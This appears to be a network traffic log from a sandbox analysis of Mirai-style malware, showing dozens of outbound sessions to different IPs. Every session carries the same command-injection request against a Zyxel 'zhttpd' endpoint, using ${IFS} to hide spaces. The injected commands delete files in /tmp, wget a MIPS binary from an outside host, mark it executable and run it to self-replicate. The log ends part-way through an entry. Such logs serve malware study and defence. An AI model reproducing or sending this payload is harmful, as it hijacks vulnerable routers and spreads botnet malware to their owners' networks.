                                              Jan 29, 2024 07:03:51.034342051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4743192.168.2.1460934123.32.48.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034387112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4744192.168.2.1435458113.211.187.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034435034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4745192.168.2.145974627.162.235.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034455061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4746192.168.2.143949493.247.118.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034492970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4747192.168.2.14500481.201.67.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046017885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4748192.168.2.1456042160.53.192.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046045065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4749192.168.2.143476488.208.47.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046082020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4750192.168.2.143867214.209.114.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046116114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4751192.168.2.1455666190.33.153.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046148062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4752192.168.2.144708653.162.131.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046180010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4753192.168.2.145552076.237.147.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046231985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4754192.168.2.1454794177.24.227.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046267986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4755192.168.2.1433570111.7.101.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046294928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4756192.168.2.1447250222.213.76.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046346903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4757192.168.2.1433608135.40.217.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046376944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4758192.168.2.145376867.238.119.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046410084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4759192.168.2.1446398182.171.205.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046442032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4760192.168.2.1440330120.21.42.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046480894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4761192.168.2.1433358101.155.189.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046509981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4762192.168.2.146052268.162.201.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046541929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4763192.168.2.1438436201.39.38.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046597958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4764192.168.2.1433718190.122.160.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046636105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4765192.168.2.1438640190.240.131.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046653986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4766192.168.2.1451296193.189.208.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046710014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4767192.168.2.144374082.96.234.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046716928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4768192.168.2.146012220.95.90.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046758890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4769192.168.2.1446124201.38.9.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046813965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4770192.168.2.1434932115.112.38.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046869040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4771192.168.2.1456508103.104.203.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046909094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4772192.168.2.1460428177.14.77.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046951056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4773192.168.2.1451436113.177.174.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.046982050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4774192.168.2.1457024105.206.4.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047009945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4775192.168.2.143289085.43.82.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047060013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4776192.168.2.1434730194.174.225.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047101974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4777192.168.2.1455134193.202.207.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047130108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4778192.168.2.1449426111.11.72.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047163963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4779192.168.2.143559037.107.223.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047211885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4780192.168.2.1450636161.12.111.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047223091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4781192.168.2.1458866198.6.239.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047259092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4782192.168.2.1439338148.23.251.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047302008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4783192.168.2.1437846146.20.168.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047343016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4784192.168.2.1438352149.124.22.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047373056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4785192.168.2.145549446.123.30.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047418118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4786192.168.2.1457328111.87.194.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047439098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4787192.168.2.1458024175.14.36.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047499895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4788192.168.2.1447402203.66.110.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047527075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4789192.168.2.1442480164.29.237.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047565937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4790192.168.2.144780661.40.79.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047606945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4791192.168.2.143423872.155.179.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047647953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4792192.168.2.143448667.253.236.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047669888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4793192.168.2.145209063.57.88.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047715902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4794192.168.2.1459714109.170.215.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047720909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4795192.168.2.1449134194.250.192.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047763109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4796192.168.2.1439818187.171.84.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047801018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4797192.168.2.144243250.12.24.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047830105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4798192.168.2.1452728167.28.189.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047851086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4799192.168.2.145826052.74.90.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047892094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4800192.168.2.1444230133.253.35.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047935963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4801192.168.2.1444026146.160.72.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.047969103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4802192.168.2.146058849.59.142.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048016071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4803192.168.2.1447674167.215.113.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048031092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4804192.168.2.1457730136.192.187.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048058033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4805192.168.2.144882034.220.8.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.048095942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4806192.168.2.1459808153.71.80.126443
                                              TimestampBytes transferredDirectionData
